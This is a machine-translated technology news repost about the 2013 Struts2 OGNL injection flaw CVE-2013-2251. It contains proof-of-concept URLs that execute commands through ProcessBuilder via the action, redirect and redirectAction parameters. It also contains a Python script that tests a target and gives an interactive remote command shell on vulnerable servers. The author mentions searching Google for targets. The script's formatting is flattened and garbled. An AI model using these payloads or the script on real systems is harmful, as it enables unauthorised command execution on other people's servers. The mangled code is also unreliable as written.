Shulou(Shulou.com)06/01 Report--

On July 17, I woke up from a nap at noon and saw several familiar words-Struts2, code execution remotely. Schroeder! Is it possible that a new one has been exposed since the last label? I didn't wake up yet. I suddenly woke up. As soon as I saw it decisively, then a certain cloud was brushed to the screen. A bloody scene is about to be staged.

It is reported that the affected version is 2.0.0-2.3.15 CVE-2013-2251. The reason is that the values of parameter action, redirect and redirectAction, are not filtered correctly, which allows users to remotely execute OGNL expressions when accessing applications that use Struts2.

Vulnerability proof:

Http://host/struts2-blank/example/X.action?action:%25{3*4}

Http://host/struts2-blank/example/X.action?redirect:%25{3*4}

Http://host/struts2-blank/example/X.action?redirectAction:%25{3*4}

Code testing:

Http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

Http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

Http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

The officials have updated the patch, and the administrators will type it quickly, or they won't know if their pants are taken off.

URL: http://struts.apache.org/download.cgi#struts23151

The following tools written by python under show [figure]

Use GOOGLE search almost did not frighten urine, once again strongly suggest that the management of overtime tonight to fix this! Good night

-- Update the py script code--

#! / usr/bin/env python#-*-coding: UTF-8-*-# #-# Struts2 2.0.0-Struts 2.3.The CVE-2013-2251#--#Copyright By Terryll right Reserved#author date comment#Terry 2013-7-17 Createdimport urllibimport urllib2import reimport sysurl_exp = "? redirect:$ {% 23a%3d (new%20java.lang.ProcessBuilder [] {'whoami'})) .start (),% 23b%3d%23a.getInputStream (),% 23c%3dnew%20java.io.InputStreamReader (% 23b),% 23d%3dnew%20java.io.BufferedReader (% 23c),% 23e%3dnew%20char [50000],% 23d.read (% 23e) % 23matt%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),% 23matt.getWriter () .println (% 23e),% 23matt.getWriter () .flush () % 23matt.getWriter () .close ()} "def judge (url): # determine whether the vulnerability exists if url.endswith (" .action "): try: url = url + url_exp # print url url_request = urllib2.Request (url) response = urllib2.urlopen (url_request) res_html = response. Read () # print res_html [: 100] if res_html.find (">") > 0: return "Failed" else: return "OK" # print response.func_code except: return "ERROR" else: return "url error" def get_args (argument): # # conversion to parameter format such as' ls' '- al' # args = argument.split ('') args_deal =''for i in args: args_deal = args_deal + "'" + I + "," args_deal = args_deal [:-1] return args_dealdef strip (str): # # remove\ x00 string # tmp= str.strip () blank_line=re.compile ('\ x00') tmp=blank_line.sub ('' Tmp) return tmpdef attack (url): # # DO IT # try: url_request = urllib2.Request (url) response = urllib2.urlopen (url_request) res_html = response.read (). Strip () return strip (res_html) except: return "ERROR" if _ name__ = ='_ main__': if len (sys.argv) ) > 1: # print get_url ("ls-al") if judge (sys.argv [1]) = "OK": print "Success" pattern = re.compile (r'http [s]?: / / ([\ w\ W] *?) /') url = sys.argv [1] + url_exp hostname = pattern.findall (url) # print hostname [0] loop= 1 while loop: string = raw_input (hostname [0] + ">") if string.startswith ("exit"): break loop=0 if len (string) > 0: Url_ = url.replace ("'whoami'" Get_args (string)) # print url_ print attack (url_) else: print "Failed" else: print ("No argument!")

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.